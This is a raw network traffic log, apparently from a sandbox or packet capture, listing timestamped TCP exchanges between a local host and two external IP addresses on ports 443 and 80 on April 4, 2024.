Apr 4, 2024 17:49:21.059792042 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.059869051 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.059869051 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.059876919 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.062005997 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.066145897 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.066167116 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.066207886 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.066220999 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.066248894 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.066278934 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.073786974 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.073810101 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.073868990 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.073877096 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.073915958 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.073915958 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.080245018 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.080262899 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.080307007 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.080313921 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.080346107 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.080369949 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.089489937 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.089519978 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.089591026 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.089591026 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.089603901 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.090051889 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.095550060 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.095576048 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.095658064 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.095658064 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.095668077 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.096050024 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.102416992 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.102446079 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.102518082 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.102518082 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.102530003 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.102611065 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.109339952 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.109376907 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.109419107 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.109432936 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.109452009 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.109616041 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.116203070 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.116247892 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.116314888 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.116323948 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.116338968 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.116384029 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.122283936 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.122315884 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.122343063 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.122359991 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.122396946 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.122396946 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.127963066 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.127999067 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.128145933 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.128145933 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.128154993 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.128211021 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.134215117 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.134251118 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.134303093 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.134310007 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.134346008 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.134346008 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.140129089 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.140152931 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.140227079 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.140239000 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.140248060 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.140290022 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.145440102 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.145469904 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.145550013 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.145550013 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.145558119 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.145618916 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.150657892 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.150681019 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.150764942 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.150772095 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.150825977 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.156589985 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.156610012 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.156754017 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.156764984 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.156899929 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.162072897 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.162103891 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.162147999 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.162154913 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.162189007 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.162240028 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.165749073 CEST	80	49766	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:21.167107105 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.167124033 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.167180061 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.167186022 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.167201042 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.168365955 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.172808886 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.172828913 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.172892094 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.172898054 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.172939062 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.172939062 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.177858114 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.177881002 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.177954912 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.177954912 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.177964926 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.178143978 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.179472923 CEST	80	49766	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:21.179606915 CEST	49766	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:21.179666996 CEST	80	49766	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:21.179723978 CEST	49766	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:21.182033062 CEST	49768	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:21.182843924 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.182863951 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.182929993 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.182934999 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.182956934 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.183013916 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.188309908 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.188333035 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.188374996 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.188381910 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.188400984 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.188461065 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.192920923 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.192939997 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.192975998 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.192995071 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.193031073 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.193059921 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.197597027 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.197617054 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.197693110 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.197694063 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.197702885 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.197985888 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.202420950 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.202440977 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.202491045 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.202497005 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.202553988 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.202553988 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.207669020 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.207689047 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.207741022 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.207746983 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.207787991 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.212111950 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.212132931 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.212199926 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.212205887 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.212249994 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.217123985 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.217144012 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.217194080 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.217199087 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.217230082 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.217309952 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.221743107 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.221765041 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.221822023 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.221828938 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.221882105 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.221882105 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.226026058 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.226052046 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.226105928 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.226110935 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.226130962 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.226152897 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.230814934 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.230839968 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.230901003 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.230901003 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.230909109 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.230984926 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.235055923 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.235074043 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.235173941 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.235183001 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.235239029 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.239378929 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.239404917 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.239527941 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.239527941 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.239536047 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.241069078 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.243568897 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.243588924 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.243659019 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.243665934 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.243727922 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.248038054 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.248058081 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.248107910 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.248114109 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.248172045 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.248258114 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.252424002 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.252444029 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.252489090 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.252495050 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.252515078 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.252557993 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.255794048 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.255812883 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.255867958 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.255872965 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.255917072 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.260565996 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.260585070 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.260667086 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.260673046 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.260719061 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.264441013 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.264463902 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.264561892 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.264561892 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.264568090 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.264914989 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.268102884 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.268126011 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.268214941 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.268214941 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.268229008 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.268377066 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.271769047 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.271791935 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.271847963 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.271861076 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.271889925 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.271955967 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.276242018 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.276259899 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.276329041 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.276338100 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.276386976 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.276386976 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.280071974 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.280090094 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.280160904 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.280165911 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.280189037 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.280603886 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.283521891 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.283545971 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.283603907 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.283611059 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.283660889 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.287827015 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.287847042 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.287918091 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.287918091 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.287924051 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.288240910 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.291354895 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.291373014 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.291436911 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.291441917 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.291484118 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.291484118 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.294877052 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.294898033 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.294955015 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.294960022 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.294986963 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.295010090 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.299247026 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.299268007 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.299325943 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.299331903 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.299388885 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.299447060 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.302397966 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.302416086 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.302495956 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.302503109 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.302578926 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.302580118 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.305788040 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.305805922 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.305886030 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.305891991 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.305958033 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.309221029 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.309256077 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.309322119 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.309340954 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.309387922 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.313194990 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.313216925 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.313318014 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.313329935 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.313375950 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.316488981 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.316510916 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.316633940 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.316651106 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.316734076 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.319734097 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.319758892 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.319855928 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.319865942 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.319916010 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.319983006 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.323635101 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.323657990 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.323788881 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.323798895 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.323920012 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.326844931 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.326865911 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.326903105 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.326920033 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.327047110 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.327451944 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.329965115 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.329982996 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.330058098 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.330058098 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:21.330064058 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:21.330595016 CEST	49760	443	192.168.2.10	95.216.179.73
